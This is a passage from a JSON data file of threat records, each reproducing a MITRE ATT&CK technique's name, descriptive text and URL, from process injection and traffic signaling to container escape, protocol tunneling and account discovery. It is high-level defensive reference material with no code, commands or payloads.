the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process. \n\nThere are many different ways to inject code into a process, many of which abuse legitimate functionalities. These implementations exist for every major OS but are typically platform specific. \n\nMore sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.\nhttps://attack.mitre.org/techniques/T1055\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1205 - Traffic Signaling", - "description": "Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.\n\nAdversaries may also communicate with an already open port, but the service listening on that port will only respond to commands or trigger other malicious functionality if passed the appropriate magic value(s).\n\nThe observation of the signal packets to trigger the communication can be conducted through different methods. One means, originally implemented by Cd00r (Citation: Hartrell cd00r 2002), is to use the libpcap libraries to sniff for the packets in question. Another method leverages raw sockets, which enables the malware to use ports that are already open for use by other programs.\n\nOn network devices, adversaries may use crafted packets to enable [Network Device Authentication](https://attack.mitre.org/techniques/T1556/004) for standard services offered by the device such as telnet. Such signaling may also be used to open a closed service port such as telnet, or to trigger module modification of malware implants on the device, adding, removing, or changing malicious capabilities. Adversaries may use crafted packets to attempt to connect to one or more (open or closed) ports, but may also attempt to connect to a router interface, broadcast, and network address IP on the same port in order to achieve their goals and objectives.(Citation: Cisco Synful Knock Evolution)(Citation: Mandiant - Synful Knock)(Citation: Cisco Blog Legacy Device Attacks) To enable this traffic signaling on embedded devices, adversaries must first achieve and leverage [Patch System Image](https://attack.mitre.org/techniques/T1601/001) due to the monolithic nature of the architecture.\n\nAdversaries may also use the Wake-on-LAN feature to turn on powered off systems. Wake-on-LAN is a hardware feature that allows a powered down system to be powered on, or woken up, by sending a magic packet to it. Once the system is powered on, it may become a target for lateral movement.(Citation: Bleeping Computer - Ryuk WoL)(Citation: AMD Magic Packet)\nhttps://attack.mitre.org/techniques/T1205\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1218 - System Binary Proxy Execution", - "description": "Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed, or otherwise trusted, binaries. Binaries used in this technique are often Microsoft-signed files, indicating that they have been either downloaded from Microsoft or are already native in the operating system.(Citation: LOLBAS Project) Binaries signed with trusted digital certificates can typically execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files or commands.\n\nSimilarly, on Linux systems adversaries may abuse trusted binaries such as split to proxy execution of malicious commands.(Citation: split man page)(Citation: GTFO split)\nhttps://attack.mitre.org/techniques/T1218\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1620 - Reflective Code Loading", - "description": "Adversaries may reflectively load code into a process in order to conceal the execution of malicious payloads. Reflective loading involves allocating then executing payloads directly within the memory of the process, vice creating a thread or process backed by a file path on disk. Reflectively loaded payloads may be compiled binaries, anonymous files (only present in RAM), or just snubs of fileless executable code (ex: position-independent shellcode).(Citation: Introducing Donut)(Citation: S1 Custom Shellcode Tool)(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Mandiant BYOL)\n\nReflective code injection is very similar to [Process Injection](https://attack.mitre.org/techniques/T1055) except that the \u201cinjection\u201d loads code into the processes\u2019 own memory instead of that of a separate process. Reflective loading may evade process-based detections since the execution of the arbitrary code may be masked within a legitimate or otherwise benign process. Reflectively loading payloads directly into memory may also avoid creating files or other artifacts on disk, while also enabling malware to keep these payloads encrypted (or otherwise obfuscated) until execution.(Citation: Stuart ELF Memory)(Citation: 00sec Droppers)(Citation: Intezer ACBackdoor)(Citation: S1 Old Rat New Tricks)\nhttps://attack.mitre.org/techniques/T1620\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1611 - Escape to Host", - "description": "Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.(Citation: Docker Overview)\n\nThere are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host\u2019s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as `unshare` and `keyctl` to escalate privileges and steal secrets.(Citation: Docker Bind Mounts)(Citation: Trend Micro Privileged Container)(Citation: Intezer Doki July 20)(Citation: Container Escape)(Citation: Crowdstrike Kubernetes Container Escape)(Citation: Keyctl-unmask)\n\nAdditionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as `docker.sock`, to break out of the container via a [Container Administration Command](https://attack.mitre.org/techniques/T1609).(Citation: Container Escape) Adversaries may also escape via [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068), such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.(Citation: Windows Server Containers Are Open)\n\nGaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.\nhttps://attack.mitre.org/techniques/T1611\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1010 - Application Window Discovery", - "description": "Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)\n\nAdversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.\nhttps://attack.mitre.org/techniques/T1010\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1029 - Scheduled Transfer", - "description": "Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain intervals. This could be done to blend traffic patterns with normal activity or availability.\n\nWhen scheduled exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048).\nhttps://attack.mitre.org/techniques/T1029\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1525 - Implant Internal Image", - "description": "Adversaries may implant cloud or container images with malicious code to establish persistence after gaining access to an environment. Amazon Web Services (AWS) Amazon Machine Images (AMIs), Google Cloud Platform (GCP) Images, and Azure Images as well as popular container runtimes such as Docker can be implanted or backdoored. Unlike [Upload Malware](https://attack.mitre.org/techniques/T1608/001), this technique focuses on adversaries implanting an image in a registry within a victim\u2019s environment. Depending on how the infrastructure is provisioned, this could provide persistent access if the infrastructure provisioning tool is instructed to always use the latest image.(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\n\nA tool has been developed to facilitate planting backdoors in cloud container images.(Citation: Rhino Labs Cloud Backdoor September 2019) If an adversary has access to a compromised AWS instance, and permissions to list the available container images, they may implant a backdoor such as a [Web Shell](https://attack.mitre.org/techniques/T1505/003).(Citation: Rhino Labs Cloud Image Backdoor Technique Sept 2019)\nhttps://attack.mitre.org/techniques/T1525\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1572 - Protocol Tunneling", - "description": "Adversaries may tunnel network communications to and from a victim system within a separate protocol to avoid detection/network filtering and/or enable access to otherwise unreachable systems. Tunneling involves explicitly encapsulating a protocol within another. This behavior may conceal malicious traffic by blending in with existing traffic and/or provide an outer layer of encryption (similar to a VPN). Tunneling could also enable routing of network packets that would otherwise not reach their intended destination, such as SMB, RDP, or other traffic that would be filtered by network appliances or not routed over the Internet. \n\nThere are various means to encapsulate a protocol within another protocol. For example, adversaries may perform SSH tunneling (also known as SSH port forwarding), which involves forwarding arbitrary data over an encrypted SSH tunnel.(Citation: SSH Tunneling) \n\n[Protocol Tunneling](https://attack.mitre.org/techniques/T1572) may also be abused by adversaries during [Dynamic Resolution](https://attack.mitre.org/techniques/T1568). Known as DNS over HTTPS (DoH), queries to resolve C2 infrastructure may be encapsulated within encrypted HTTPS packets.(Citation: BleepingComp Godlua JUL19) \n\nAdversaries may also leverage [Protocol Tunneling](https://attack.mitre.org/techniques/T1572) in conjunction with [Proxy](https://attack.mitre.org/techniques/T1090) and/or [Protocol Impersonation](https://attack.mitre.org/techniques/T1001/003) to further conceal C2 communications and infrastructure.\nhttps://attack.mitre.org/techniques/T1572\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1550 - Use Alternate Authentication Material", - "description": "Adversaries may use alternate authentication material, such as password hashes, Kerberos tickets, and application access tokens, in order to move laterally within an environment and bypass normal system access controls. \n\nAuthentication processes generally require a valid identity (e.g., username) along with one or more authentication factors (e.g., password, pin, physical smart card, token generator, etc.). Alternate authentication material is legitimately generated by systems after a user or application successfully authenticates by providing a valid identity and the required authentication factor(s). Alternate authentication material may also be generated during the identity creation process.(Citation: NIST Authentication)(Citation: NIST MFA)\n\nCaching alternate authentication material allows the system to verify an identity has successfully authenticated without asking the user to reenter authentication factor(s). Because the alternate authentication must be maintained by the system\u2014either in memory or on disk\u2014it may be at risk of being stolen through [Credential Access](https://attack.mitre.org/tactics/TA0006) techniques. By stealing alternate authentication material, adversaries are able to bypass system access controls and authenticate to systems without knowing the plaintext password or any additional authentication factors.\nhttps://attack.mitre.org/techniques/T1550\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1011 - Exfiltration Over Other Network Medium", - "description": "Adversaries may attempt to exfiltrate data over a different network medium than the command and control channel. If the command and control network is a wired Internet connection, the exfiltration may occur, for example, over a WiFi connection, modem, cellular data connection, Bluetooth, or another radio frequency (RF) channel.\n\nAdversaries may choose to do this if they have sufficient access or proximity, and the connection might not be secured or defended as well as the primary Internet-connected channel because it is not routed through the same enterprise network.\nhttps://attack.mitre.org/techniques/T1011\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1589 - Gather Victim Identity Information", - "description": "Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials.\n\nAdversaries may gather this information in various ways, such as direct elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about users could also be enumerated via other active means (i.e. [Active Scanning](https://attack.mitre.org/techniques/T1595)) such as probing and analyzing responses from authentication services that may reveal valid usernames in a system.(Citation: GrimBlog UsernameEnum) Information about victims may also be exposed to adversaries via online or other accessible data sets (ex: [Social Media](https://attack.mitre.org/techniques/T1593/001) or [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: OPM Leak)(Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks)\n\nGathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\nhttps://attack.mitre.org/techniques/T1589\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1560 - Archive Collected Data", - "description": "An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.\n\nBoth compression and encryption are done prior to exfiltration, and can be performed using a utility, 3rd party library, or custom method.\nhttps://attack.mitre.org/techniques/T1560\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1185 - Browser Session Hijacking", - "description": "Adversaries may take advantage of security vulnerabilities and inherent functionality in browser software to change content, modify user-behaviors, and intercept information as part of various browser session hijacking techniques.(Citation: Wikipedia Man in the Browser)\n\nA specific example is when an adversary injects software into a browser that allows them to inherit cookies, HTTP sessions, and SSL client certificates of a user then use the browser as a way to pivot into an authenticated intranet.(Citation: Cobalt Strike Browser Pivot)(Citation: ICEBRG Chrome Extensions) Executing browser-based behaviors such as pivoting may require specific process permissions, such as SeDebugPrivilege and/or high-integrity/administrator rights.\n\nAnother example involves pivoting browser traffic from the adversary's browser through the user's browser by setting up a proxy which will redirect web traffic. This does not alter the user's traffic in any way, and the proxy connection can be severed as soon as the browser is closed. The adversary assumes the security context of whichever browser process the proxy is injected into. Browsers typically create a new process for each tab that is opened and permissions and certificates are separated accordingly. With these permissions, an adversary could potentially browse to any resource on an intranet, such as [Sharepoint](https://attack.mitre.org/techniques/T1213/002) or webmail, that is accessible through the browser and which the browser has sufficient permissions. Browser pivoting may also bypass security provided by 2-factor authentication.(Citation: cobaltstrike manual)\nhttps://attack.mitre.org/techniques/T1185\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1021 - Remote Services", - "description": "Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to log into a service that accepts remote connections, such as telnet, SSH, and VNC. The adversary may then perform actions as the logged-on user.\n\nIn an enterprise environment, servers and workstations can be organized into domains. Domains provide centralized identity management, allowing users to login using one set of credentials across the entire network. If an adversary is able to obtain a set of valid domain credentials, they could login to many different machines using remote access protocols such as secure shell (SSH) or remote desktop protocol (RDP).(Citation: SSH Secure Shell)(Citation: TechNet Remote Desktop Services) They could also login to accessible SaaS or IaaS services, such as those that federate their identities to the domain. \n\nLegitimate applications (such as [Software Deployment Tools](https://attack.mitre.org/techniques/T1072) and other administrative programs) may utilize [Remote Services](https://attack.mitre.org/techniques/T1021) to access remote hosts. For example, Apple Remote Desktop (ARD) on macOS is native software used for remote management. ARD leverages a blend of protocols, including [VNC](https://attack.mitre.org/techniques/T1021/005) to send the screen and control buffers and [SSH](https://attack.mitre.org/techniques/T1021/004) for secure file transfer.(Citation: Remote Management MDM macOS)(Citation: Kickstart Apple Remote Desktop commands)(Citation: Apple Remote Desktop Admin Guide 3.3) Adversaries can abuse applications such as ARD to gain remote code execution and perform lateral movement. In versions of macOS prior to 10.14, an adversary can escalate an SSH session to an ARD session which enables an adversary to accept TCC (Transparency, Consent, and Control) prompts without user interaction and gain access to data.(Citation: FireEye 2019 Apple Remote Desktop)(Citation: Lockboxx ARD 2019)(Citation: Kickstart Apple Remote Desktop commands)\nhttps://attack.mitre.org/techniques/T1021\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1596 - Search Open Technical Databases", - "description": "Adversaries may search freely available technical databases for information about victims that can be used during targeting. Information about victims may be available in online databases and repositories, such as registrations of domains/certificates as well as public collections of network data/artifacts gathered from traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation: Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)\n\nAdversaries may search in different open databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)).\nhttps://attack.mitre.org/techniques/T1596\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1207 - Rogue Domain Controller", - "description": "Adversaries may register a rogue Domain Controller to enable manipulation of Active Directory data. DCShadow may be used to create a rogue Domain Controller (DC). DCShadow is a method of manipulating Active Directory (AD) data, including objects and schemas, by registering (or reusing an inactive registration) and simulating the behavior of a DC. (Citation: DCShadow Blog) Once registered, a rogue DC may be able to inject and replicate changes into AD infrastructure for any domain object, including credentials and keys.\n\nRegistering a rogue DC involves creating a new server and nTDSDSA objects in the Configuration partition of the AD schema, which requires Administrator privileges (either Domain or local to the DC) or the KRBTGT hash. (Citation: Adsecurity Mimikatz Guide)\n\nThis technique may bypass system logging and security monitors such as security information and event management (SIEM) products (since actions taken on a rogue DC may not be reported to these sensors). (Citation: DCShadow Blog) The technique may also be used to alter and delete replication and other associated metadata to obstruct forensic analysis. Adversaries may also utilize this technique to perform [SID-History Injection](https://attack.mitre.org/techniques/T1134/005) and/or manipulate AD objects (such as accounts, access control lists, schemas) to establish backdoors for Persistence. (Citation: DCShadow Blog)\nhttps://attack.mitre.org/techniques/T1207\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1610 - Deploy Container", - "description": "Adversaries may deploy a container into an environment to facilitate execution or evade defenses. In some cases, adversaries may deploy a new container to execute processes associated with a particular image or deployment, such as processes that execute or download malware. In others, an adversary may deploy a new container configured without network rules, user limitations, etc. to bypass existing defenses within the environment.\n\nContainers can be deployed by various means, such as via Docker's create and start APIs or via a web application such as the Kubernetes dashboard or Kubeflow.(Citation: Docker Containers API)(Citation: Kubernetes Dashboard)(Citation: Kubeflow Pipelines) Adversaries may deploy containers based on retrieved or built malicious images or from benign images that download and execute malicious payloads at runtime.(Citation: Aqua Build Images on Hosts)\nhttps://attack.mitre.org/techniques/T1610\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1112 - Modify Registry", - "description": "Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.\n\nAccess to specific areas of the Registry depends on account permissions, some requiring administrator-level access. The built-in Windows command-line utility [Reg](https://attack.mitre.org/software/S0075) may be used for local or remote Registry modification. (Citation: Microsoft Reg) Other tools may also be used, such as a remote access tool, which may contain functionality to interact with the Registry through the Windows API.\n\nRegistry modifications may also include actions to hide keys, such as prepending key names with a null character, which will cause an error and/or be ignored when read via [Reg](https://attack.mitre.org/software/S0075) or other utilities using the Win32 API. (Citation: Microsoft Reghide NOV 2006) Adversaries may abuse these pseudo-hidden keys to conceal payloads/commands used to maintain persistence. (Citation: TrendMicro POWELIKS AUG 2014) (Citation: SpectorOps Hiding Reg Jul 2017)\n\nThe Registry of a remote system may be modified to aid in execution of files as part of lateral movement. It requires the remote Registry service to be running on the target system. (Citation: Microsoft Remote) Often [Valid Accounts](https://attack.mitre.org/techniques/T1078) are required, along with access to the remote system's [SMB/Windows Admin Shares](https://attack.mitre.org/techniques/T1021/002) for RPC communication.\nhttps://attack.mitre.org/techniques/T1112\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1580 - Cloud Infrastructure Discovery", - "description": "An adversary may attempt to discover infrastructure and resources that are available within an infrastructure-as-a-service (IaaS) environment. This includes compute service resources such as instances, virtual machines, and snapshots as well as resources of other services including the storage and database services.\n\nCloud providers offer methods such as APIs and commands issued through CLIs to serve information about infrastructure. For example, AWS provides a DescribeInstances API within the Amazon EC2 API that can return information about one or more instances within an account, the ListBuckets API that returns a list of all buckets owned by the authenticated sender of the request, the HeadBucket API to determine a bucket\u2019s existence along with access permissions of the request sender, or the GetPublicAccessBlock API to retrieve access block configuration for a bucket.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API)(Citation: AWS Get Public Access Block)(Citation: AWS Head Bucket) Similarly, GCP's Cloud SDK CLI provides the gcloud compute instances list command to list all Google Compute Engine instances in a project (Citation: Google Compute Instances), and Azure's CLI command az vm list lists details of virtual machines.(Citation: Microsoft AZ CLI) In addition to API commands, adversaries can utilize open source tools to discover cloud storage infrastructure through [Wordlist Scanning](https://attack.mitre.org/techniques/T1595/003).(Citation: Malwarebytes OSINT Leaky Buckets - Hioureas)\n\nAn adversary may enumerate resources using a compromised user's access keys to determine which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these available resources may help adversaries determine their next steps in the Cloud environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020)An adversary may also use this information to change the configuration to make the bucket publicly accessible, allowing data to be accessed without authentication. Adversaries have also may use infrastructure discovery APIs such as DescribeDBInstances to determine size, owner, permissions, and network ACLs of database resources. (Citation: AWS Describe DB Instances) Adversaries can use this information to determine the potential value of databases and discover the requirements to access them. Unlike in [Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique focuses on the discovery of components of the provided services rather than the services themselves.\nhttps://attack.mitre.org/techniques/T1580\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1491 - Defacement", - "description": "Adversaries may modify visual content available internally or externally to an enterprise network, thus affecting the integrity of the original content. Reasons for [Defacement](https://attack.mitre.org/techniques/T1491) include delivering messaging, intimidation, or claiming (possibly false) credit for an intrusion. Disturbing or offensive images may be used as a part of [Defacement](https://attack.mitre.org/techniques/T1491) in order to cause user discomfort, or to pressure compliance with accompanying messages.\nhttps://attack.mitre.org/techniques/T1491\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1535 - Unused/Unsupported Cloud Regions", - "description": "Adversaries may create cloud instances in unused geographic service regions in order to evade detection. Access is usually obtained through compromising accounts used to manage cloud infrastructure.\n\nCloud service providers often provide infrastructure throughout the world in order to improve performance, provide redundancy, and allow customers to meet compliance requirements. Oftentimes, a customer will only use a subset of the available regions and may not actively monitor other regions. If an adversary creates resources in an unused region, they may be able to operate undetected.\n\nA variation on this behavior takes advantage of differences in functionality across cloud regions. An adversary could utilize regions which do not support advanced detection services in order to avoid detection of their activity.\n\nAn example of adversary use of unused AWS regions is to mine cryptocurrency through [Resource Hijacking](https://attack.mitre.org/techniques/T1496), which can cost organizations substantial amounts of money over time depending on the processing power used.(Citation: CloudSploit - Unused AWS Regions)\nhttps://attack.mitre.org/techniques/T1535\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1563 - Remote Service Session Hijacking", - "description": "Adversaries may take control of preexisting sessions with remote services to move laterally in an environment. Users may use valid credentials to log into a service specifically designed to accept remote connections, such as telnet, SSH, and RDP. When a user logs into a service, a session will be established that will allow them to maintain a continuous interaction with that service.\n\nAdversaries may commandeer these sessions to carry out actions on remote systems. [Remote Service Session Hijacking](https://attack.mitre.org/techniques/T1563) differs from use of [Remote Services](https://attack.mitre.org/techniques/T1021) because it hijacks an existing session rather than creating a new session using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: RDP Hijacking Medium)(Citation: Breach Post-mortem SSH Hijack)\nhttps://attack.mitre.org/techniques/T1563\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1217 - Browser Information Discovery", - "description": "Adversaries may enumerate information about browsers to learn more about compromised environments. Data saved by browsers (such as bookmarks, accounts, and browsing history) may reveal a variety of personal information about users (e.g., banking sites, relationships/interests, social media, etc.) as well as details about internal network resources such as servers, tools/dashboards, or other related infrastructure.(Citation: Kaspersky Autofill)\n\nBrowser information may also highlight additional targets after an adversary has access to valid credentials, especially [Credentials In Files](https://attack.mitre.org/techniques/T1552/001) associated with logins cached by a browser.\n\nSpecific storage locations vary based on platform and/or application, but browser information is typically stored in local files and databases (e.g., `%APPDATA%/Google/Chrome`).(Citation: Chrome Roaming Profiles)\nhttps://attack.mitre.org/techniques/T1217\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1092 - Communication Through Removable Media", - "description": "Adversaries can perform command and control between compromised hosts on potentially disconnected networks using removable media to transfer commands from system to system. Both systems would need to be compromised, with the likelihood that an Internet-connected system was compromised first and the second through lateral movement by [Replication Through Removable Media](https://attack.mitre.org/techniques/T1091). Commands and files would be relayed from the disconnected system to the Internet-connected system to which the adversary has direct access.\nhttps://attack.mitre.org/techniques/T1092\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1222 - File and Directory Permissions Modification", - "description": "Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.(Citation: Hybrid Analysis Icacls1 June 2018)(Citation: Hybrid Analysis Icacls2 May 2018) File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).\n\nModifications may include changing specific access rights, which may require taking ownership of a file or directory and/or elevated permissions depending on the file or directory\u2019s existing permissions. This may enable malicious activity such as modifying, replacing, or deleting specific files or directories. Specific file and directory modifications may be a required step for many techniques, such as establishing Persistence via [Accessibility Features](https://attack.mitre.org/techniques/T1546/008), [Boot or Logon Initialization Scripts](https://attack.mitre.org/techniques/T1037), [Unix Shell Configuration Modification](https://attack.mitre.org/techniques/T1546/004), or tainting/hijacking other instrumental binary/configuration files via [Hijack Execution Flow](https://attack.mitre.org/techniques/T1574).\n\nAdversaries may also change permissions of symbolic links. For example, malware (particularly ransomware) may modify symbolic links and associated settings to enable access to files from local shortcuts with remote paths.(Citation: new_rust_based_ransomware)(Citation: bad_luck_blackcat)(Citation: falconoverwatch_blackcat_attack)(Citation: blackmatter_blackcat)(Citation: fsutil_behavior)\nhttps://attack.mitre.org/techniques/T1222\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1595 - Active Scanning", - "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).\nhttps://attack.mitre.org/techniques/T1595\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1548 - Abuse Elevation Control Mechanism", - "description": "Adversaries may circumvent mechanisms designed to control elevate privileges to gain higher-level permissions. Most modern systems contain native elevation control mechanisms that are intended to limit privileges that a user can perform on a machine. Authorization has to be granted to specific users in order to perform tasks that can be considered of higher risk. An adversary can perform several methods to take advantage of built-in control mechanisms in order to escalate privileges on a system.\nhttps://attack.mitre.org/techniques/T1548\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1125 - Video Capture", - "description": "An adversary can leverage a computer's peripheral devices (e.g., integrated cameras or webcams) or applications (e.g., video call services) to capture video recordings for the purpose of gathering information. Images may also be captured from devices or applications, potentially in specified intervals, in lieu of video files.\n\nMalware or scripts may be used to interact with the devices through an available API provided by the operating system or an application to capture video or images. Video or image files may be written to disk and exfiltrated later. This technique differs from [Screen Capture](https://attack.mitre.org/techniques/T1113) due to use of specific devices or applications for video recording rather than capturing the victim's screen.\n\nIn macOS, there are a few different malware samples that record the user's webcam such as FruitFly and Proton. (Citation: objective-see 2017 review)\nhttps://attack.mitre.org/techniques/T1125\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1016 - System Network Configuration Discovery", - "description": "Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include [Arp](https://attack.mitre.org/software/S0099), [ipconfig](https://attack.mitre.org/software/S0100)/[ifconfig](https://attack.mitre.org/software/S0101), [nbtstat](https://attack.mitre.org/software/S0102), and [route](https://attack.mitre.org/software/S0103).\n\nAdversaries may also leverage a [Network Device CLI](https://attack.mitre.org/techniques/T1059/008) on network devices to gather information about configurations and settings, such as IP addresses of configured interfaces and static/dynamic routes (e.g. show ip route, show ip interface).(Citation: US-CERT-TA18-106A)(Citation: Mandiant APT41 Global Intrusion )\n\nAdversaries may use the information from [System Network Configuration Discovery](https://attack.mitre.org/techniques/T1016) during automated discovery to shape follow-on behaviors, including determining certain access within the target network and what actions to do next.\nhttps://attack.mitre.org/techniques/T1016\n", - "provider": "MITRE ATT&CK" - } - }, - { - "type": "threat", - "fields": { - "name": "T1087 - Account Discovery", - "description": "Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., [Valid Accounts](https://attack.mitre.org/techniques/T1078)).\n\nAdversaries may use several methods to enumerate accounts, including abuse of existing tools, built-in commands, and potential misconfigurations that leak account names and roles or permissions in the targeted environment.\n\nFor examples, cloud environments typically provide easily accessible interfaces to obtain user lists. On hosts, adversaries 